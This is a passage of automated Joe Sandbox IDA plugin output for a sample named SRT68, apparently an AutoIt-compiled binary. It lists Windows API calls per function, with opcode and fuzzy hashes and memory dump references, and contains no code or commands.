                                                                      • Instruction ID: 2823c93cc58bc2b9ac2b89299de36bd8496ca53a1a4be617295831917afd6201
                                                                      • Opcode Fuzzy Hash: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
                                                                      • Instruction Fuzzy Hash: F7310F71A01119BFEB659F94D8C9EFFBBBCEF08340F1001A9F645A2140DA795A459BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010262EC
                                                                      • GetWindowLongW.USER32(015855C0,000000F0), ref: 0102631F
                                                                      • GetWindowLongW.USER32(015855C0,000000F0), ref: 01026354
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01026386
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010263B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 010263C1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010263DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
                                                                      • Instruction ID: a0cd9cc8f516fa830dcf4a04641b0e5f4e5b8e5cecf17d0401e1a6171c96aecf
                                                                      • Opcode Fuzzy Hash: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
                                                                      • Instruction Fuzzy Hash: DC310730644161AFDB31CF28D888F553BE5FB4A754F1941A4F9819F2B6CB77A840CB91
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB2E
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB54
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FFDB57
                                                                      • SysAllocString.OLEAUT32(?), ref: 00FFDB75
                                                                      • SysFreeString.OLEAUT32(?), ref: 00FFDB7E
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDBA3
                                                                      • SysAllocString.OLEAUT32(?), ref: 00FFDBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 5d805c77e6d0c8c1b1ef1887d1e4c5a6186e3f47f8e421eff47cfd37780e0894
                                                                      • Instruction ID: 6c98e479e9498a9b34798d622ea77d7696d21af411ecbaeb46109a8a44e69b6d
                                                                      • Opcode Fuzzy Hash: 5d805c77e6d0c8c1b1ef1887d1e4c5a6186e3f47f8e421eff47cfd37780e0894
                                                                      • Instruction Fuzzy Hash: 8421A63260121EAFDF20DEA8DC48DBB73ADEF49360B118125FB54DB260DB749C419760
                                                                      APIs
                                                                        • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010161C6
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010161D5
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0101620E
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 01016217
                                                                      • WSAGetLastError.WSOCK32 ref: 01016221
                                                                      • closesocket.WSOCK32(00000000), ref: 0101624A
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01016263
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 910771015-0
                                                                      • Opcode ID: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
                                                                      • Instruction ID: e44cc9e17ddb805c9d592ac74007e8f52cec98289fd4f32f8f32af409a4e0de8
                                                                      • Opcode Fuzzy Hash: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
                                                                      • Instruction Fuzzy Hash: 6731A171600118ABEF20AF64CC85BBE7BF9EF45750F044069FD85E7285CBB9A9049BA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      • Opcode ID: a62855bba46d9595b821556fc873fbf8f8c86de1273cdd547400aab5d8691f4a
                                                                      • Instruction ID: 34ace9235c638d792dbf6dc840b31eceb992e276c6fc6802969d22c40a5dfed0
                                                                      • Opcode Fuzzy Hash: a62855bba46d9595b821556fc873fbf8f8c86de1273cdd547400aab5d8691f4a
                                                                      • Instruction Fuzzy Hash: 8F2149736141166AD320BA34AD03FB7B398DF55360F14403DF686CA171EF949D4AF295
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC09
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC2F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FFDC32
                                                                      • SysAllocString.OLEAUT32 ref: 00FFDC53
                                                                      • SysFreeString.OLEAUT32 ref: 00FFDC5C
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDC76
                                                                      • SysAllocString.OLEAUT32(?), ref: 00FFDC84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 86dec8c68d856579fb26196d6dd8e786a65a6e9e21003a97e616f70679182d7e
                                                                      • Instruction ID: 11f520a9d4a581ef7f1d8862194e8675121918c7e6944f2019cdf7065ce80097
                                                                      • Opcode Fuzzy Hash: 86dec8c68d856579fb26196d6dd8e786a65a6e9e21003a97e616f70679182d7e
                                                                      • Instruction Fuzzy Hash: 30218636604209AFDB20EFA8DC89DBA77EDEF09360B108125FA54CB264DBB4DC41D764
                                                                      APIs
                                                                        • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                        • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                        • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01027632
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0102763F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0102764A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01027659
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01027665
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                      • Instruction ID: 258b1657aef3fd019504b4574eb3f18b552b0a85395112dc721080bcd1c60927
                                                                      • Opcode Fuzzy Hash: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                      • Instruction Fuzzy Hash: D11193B111012ABFEF258E64CC85EE7BF6DEF08798F014114FA44A6050C6729C21DBA4
                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00FC9AE6
                                                                        • Part of subcall function 00FC3187: EncodePointer.KERNEL32(00000000), ref: 00FC318A
                                                                        • Part of subcall function 00FC3187: __initp_misc_winsig.LIBCMT ref: 00FC31A5
                                                                        • Part of subcall function 00FC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FC9EA0
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FC9EB4
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FC9EC7
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FC9EDA
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FC9EED
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FC9F00
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FC9F13
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FC9F26
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FC9F39
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FC9F4C
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FC9F5F
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FC9F72
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FC9F85
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FC9F98
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FC9FAB
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FC9FBE
                                                                      • __mtinitlocks.LIBCMT ref: 00FC9AEB
                                                                      • __mtterm.LIBCMT ref: 00FC9AF4
                                                                        • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C56
                                                                        • Part of subcall function 00FC9B5C: _free.LIBCMT ref: 00FC9C5D
                                                                        • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(0105EC00,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C7F
                                                                      • __calloc_crt.LIBCMT ref: 00FC9B19
                                                                      • __initptd.LIBCMT ref: 00FC9B3B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FC9B42
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                      • String ID:
                                                                      • API String ID: 3567560977-0
                                                                      • Opcode ID: e2b576f7515f741da0a88871cf37b697b370f13cc0c96c91c2f7a26673c53c37
                                                                      • Instruction ID: e5301339d7c1a4a54dc5c0d84ffb0a2ad38c256bf3a9407d393d05aa4dfd9f86
                                                                      • Opcode Fuzzy Hash: e2b576f7515f741da0a88871cf37b697b370f13cc0c96c91c2f7a26673c53c37
                                                                      • Instruction Fuzzy Hash: A2F0C23290D31329E7347A74BE0BF4A36909F42770B20061EF094950C2EE999A0125A0
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FC3F85), ref: 00FC4085
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FC408C
                                                                      • EncodePointer.KERNEL32(00000000), ref: 00FC4097
                                                                      • DecodePointer.KERNEL32(00FC3F85), ref: 00FC40B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                      • String ID: RoUninitialize$combase.dll
                                                                      • API String ID: 3489934621-2819208100
                                                                      • Opcode ID: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
                                                                      • Instruction ID: 0aebefceb2c16af2d5b602e3f00290f836a4859c45b619b2e4bb881455c20f9f
                                                                      • Opcode Fuzzy Hash: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
                                                                      • Instruction Fuzzy Hash: 53E09270981202EBEA30AF61EA0EB053AB8B705B92F204018F986ED098CBBB5504DB54
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 3253778849-0
                                                                      • Opcode ID: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                                      • Instruction ID: 0f0234533335a57dbc326ad9f8133a926bb2c163b275252000c0cd977e86ec70
                                                                      • Opcode Fuzzy Hash: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                                      • Instruction Fuzzy Hash: 3F61CF7050024A9BDF02EF64CC82EFF3BA5AF0A308F044469F9955B1D2DB79D916DB50
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010202BD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010202FD
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01020320
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01020349
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0102038C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 01020399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                      • String ID:
                                                                      • API String ID: 4046560759-0
                                                                      • Opcode ID: 48401c544275ce9938c9238bea568cb66ade12a570aa329231e21cfa6b7d8ea5
                                                                      • Instruction ID: 17931b4555c1dedf5b667de9c7502c10ff964a3658a7219a8a9c23d8fe2e5da5
                                                                      • Opcode Fuzzy Hash: 48401c544275ce9938c9238bea568cb66ade12a570aa329231e21cfa6b7d8ea5
                                                                      • Instruction Fuzzy Hash: 9F515571208305AFD710EF28C885EAFBBE8EF89314F04491DF5858B2A1DB75E909DB52
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 010257FB
                                                                      • GetMenuItemCount.USER32(00000000), ref: 01025832
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0102585A
                                                                      • GetMenuItemID.USER32(?,?), ref: 010258C9
                                                                      • GetSubMenu.USER32(?,?), ref: 010258D7
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 01025928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                      • String ID:
                                                                      • API String ID: 650687236-0
                                                                      • Opcode ID: 3f432e6fe3d156b6d024ed30c6f427fe9956d893e007908e9b4fd6d9f532baaa
                                                                      • Instruction ID: eaa01e01b76b0f6e83b2c562c7df1506496437ab6b578fb1425cd1ce586ffe9c
                                                                      • Opcode Fuzzy Hash: 3f432e6fe3d156b6d024ed30c6f427fe9956d893e007908e9b4fd6d9f532baaa
                                                                      • Instruction Fuzzy Hash: A7517F71E00226AFCF11DF64CC45AEEBBB4EF49310F144099E981BB351CBB9AE419B94
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00FFEF06
                                                                      • VariantClear.OLEAUT32(00000013), ref: 00FFEF78
                                                                      • VariantClear.OLEAUT32(00000000), ref: 00FFEFD3
                                                                      • _memmove.LIBCMT ref: 00FFEFFD
                                                                      • VariantClear.OLEAUT32(?), ref: 00FFF04A
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FFF078
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                      • String ID:
                                                                      • API String ID: 1101466143-0
                                                                      • Opcode ID: e3c4fe555d601ac9e5627848f5c3e0e087bb44631d8c843c454289a0f9d45e4b
                                                                      • Instruction ID: 87d22d2792bca9a2094b3918c53816edda0f0403a2904b3e1fab91cd4fb2ff44
                                                                      • Opcode Fuzzy Hash: e3c4fe555d601ac9e5627848f5c3e0e087bb44631d8c843c454289a0f9d45e4b
                                                                      • Instruction Fuzzy Hash: F7517CB5A00209DFCB20CF58C880AAAB7B8FF4C310B158569EA49DB315E735E911CBA0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002258
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010022A3
                                                                      • IsMenu.USER32(00000000), ref: 010022C3
                                                                      • CreatePopupMenu.USER32 ref: 010022F7
                                                                      • GetMenuItemCount.USER32(000000FF), ref: 01002355
                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01002386
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                      • String ID:
                                                                      • API String ID: 3311875123-0
                                                                      • Opcode ID: bb6600a99827a38fbe9f0c609beb68b9c8f99dc0b1f96dae2dafa52c0f455812
                                                                      • Instruction ID: 4dc2cd5bda5e28807e97de620888332255cf58a7cc0fd82af3f416b1c5ea58f1
                                                                      • Opcode Fuzzy Hash: bb6600a99827a38fbe9f0c609beb68b9c8f99dc0b1f96dae2dafa52c0f455812
                                                                      • Instruction Fuzzy Hash: B751AF7060020AEBEF22CF68C98CBADBBF5BF45314F148199E995A72D0D7719A44CB51
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FA179A
                                                                      • GetWindowRect.USER32(?,?), ref: 00FA17FE
                                                                      • ScreenToClient.USER32(?,?), ref: 00FA181B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FA182C
                                                                      • EndPaint.USER32(?,?), ref: 00FA1876
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
